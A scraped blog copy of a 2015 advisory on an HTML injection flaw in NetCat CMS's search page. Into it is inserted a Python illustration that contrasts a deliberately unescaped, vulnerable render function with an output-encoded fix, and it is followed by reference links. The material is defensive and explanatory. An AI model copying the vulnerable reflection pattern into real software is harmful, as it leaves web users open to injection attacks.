<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS 3.12 /catalog/search.php?q Parameter HTML Injection Web Security Vulnerabilities</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 15, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 15, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Improper Input Validation [CWE-20]</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">OSVDB Reference: 120807</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; victim must voluntarily interact with attack mechanism<br />Access Complexity: Medium<br />Authentication: Not required to exploit<br />Impact Type: Allows unauthorized modification</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Reporter: Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/588152703639015424">@justqdjing</a>)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Advisory Details:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Version:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat can be downloaded from:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://netcat.ru/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://netcat.ru/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">NetCat.ru is a Russian company. "NetCat is designed to create the absolute majority of site types: from a simple 'business card' with minimal content to complex web-based systems, from corporate offices to online stores, libraries or media data; in other words, projects of completely different kinds and at any level of complexity. Examples of sites running on NetCat CMS can be viewed in a special section."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Even an inexperienced user can manage a site based on NetCat, because it does not require knowledge of Internet technologies, programming or markup languages. NetCat is constantly being improved and new features are added. During development, the wishes of our partners and clients, as well as trends in Internet development, are necessarily taken into account. More than 2,000 studios and private web developers have chosen NetCat for their projects, and in 2013 more than 18,000 sites were created that successfully run on our CMS."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The NetCat web application has a security flaw that can be exploited by HTML injection attacks. Hypertext Markup Language (HTML) injection, also sometimes referred to as virtual defacement, is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user-supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as it exploits both a code-based vulnerability and a user's trust.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several 0-day vulnerabilities in NetCat products have been found by other researchers before, and NetCat has patched some of them. Web Security Watch is an aggregator of security reports from various sources. It aims to provide a single point of tracking for all publicly disclosed security issues that matter. "Its unique tagging system enables you to see a relevant set of tags associated with each security alert for a quick overview of the affected products. What's more, you can now subscribe to an RSS feed containing the specific tags that you are interested in; you will then only receive alerts related to those tags." It has published suggestions, advisories and solution details related to cyber security vulnerabilities.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>The code flaw occurs on the "/catalog/search.php?" page, in the "&q" parameter.</span></div>
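As an added example (not code from this advisory or from NetCat CMS), the following Python models a search page that reflects the "q" parameter in two HTML contexts, shows the output-encoding fix, and includes the checks a defender would run to confirm the fix; the page template, the probe string and all function names are constructed for this illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for a catalogue search page. Like the real page, it
# reflects the "q" query parameter twice: in the results heading (an HTML
# text node) and in the pre-filled search box (a double-quoted attribute).
PAGE_TEMPLATE = (
    '<h1>Search results for: {heading}</h1>\n'
    '<form action="/catalog/search.php">'
    '<input name="q" value="{field}"></form>'
)

# Harmless probe used only to verify encoding; it is not an exploit string.
MARKER = "<i>nc-check</i>"


def q_from_url(url: str) -> str:
    """Return the decoded 'q' parameter of a search URL (first value, or '')."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    """Reflect q verbatim, as the flawed page does: markup in q becomes part
    of the document, and a quote in q terminates the value="..." attribute."""
    return PAGE_TEMPLATE.format(heading=q, field=q)


def render_hardened(q: str) -> str:
    """Encode q for its output context before reflecting it.

    html.escape(..., quote=True) neutralises <, >, & for the text-node
    context and " and ' for the attribute context, so one encoded value is
    safe in both places the template uses it.
    """
    safe = html.escape(q, quote=True)
    return PAGE_TEMPLATE.format(heading=safe, field=safe)


def reflects_markup(page: str, probe: str = MARKER) -> bool:
    """True if the probe survives as live markup. A correctly encoded page
    contains &lt;i&gt;nc-check&lt;/i&gt; but never the raw tag."""
    return probe in page


def input_value(page: str) -> str:
    """Return the decoded value the browser would show in the search box.

    If user input broke out of the attribute, the recovered value is
    truncated and no longer round-trips to the original search term.
    """
    m = re.search(r'<input\b[^>]*\bvalue="([^"]*)"', page)
    return html.unescape(m.group(1)) if m else ""


if __name__ == "__main__":
    # A legitimate search term containing a quote shows that the attribute
    # context breaks even without malicious intent.
    for term in (MARKER, '12" monitor'):
        for name, render in (("vulnerable", render_vulnerable),
                             ("hardened", render_hardened)):
            page = render(term)
            print(name, "markup reflected:", reflects_markup(page),
                  "search box round-trips:", input_value(page) == term)
```

The `12" monitor` case matters in practice: a plain search term with a quote already breaks the attribute in the unencoded version, which is why the check compares the recovered search-box value with the original term rather than looking for a specific payload.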
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Apr/37"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/37</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/04/15/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/15/3</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1843</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01922.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/search/author/DESC/AND/FIND/1/10/Wang+Jing/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=1</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.com/blog/static/242232054201551434123334/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/2015/06/netcat-html-injection.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://inzeed.wordpress.com/2015/04/21/netcat-html-injection/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-120807-netcat-cms-312-html.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-120807.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://blog.163.com/greensun_2006/blog/static/11122112201551434045926/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://germancast.blogspot.de/2015/06/netcat-html-injection.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/2015/06/netcat-html-injection.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/netcat-cms-3-12-html-injection/</span></a></div>
Published: 2015-06-14T00:09:00.000-07:00 (updated 2015-06-14T00:09:31.545-07:00)<br />
OSVDB 119342, 119323 NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizfK2-lz21RsIr9Y4m7zXCQuZAb0SOcv30ocyigIgU_gwfsC9RpH3x3ym7RJx5rkut3UQERkYdzYnCciA-RjRNn4JgG573UwxyCo0qLTp2_wvYo5lUGMB4RfTRrlrOHChVnsHGpv8B_puV/s1600/netcat_2.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizfK2-lz21RsIr9Y4m7zXCQuZAb0SOcv30ocyigIgU_gwfsC9RpH3x3ym7RJx5rkut3UQERkYdzYnCciA-RjRNn4JgG573UwxyCo0qLTp2_wvYo5lUGMB4RfTRrlrOHChVnsHGpv8B_puV/s400/netcat_2.png" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>OSVDB 119342, 119323 </b></span><b><span style="font-family: Arial, Helvetica, sans-serif;">NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities</span></div>
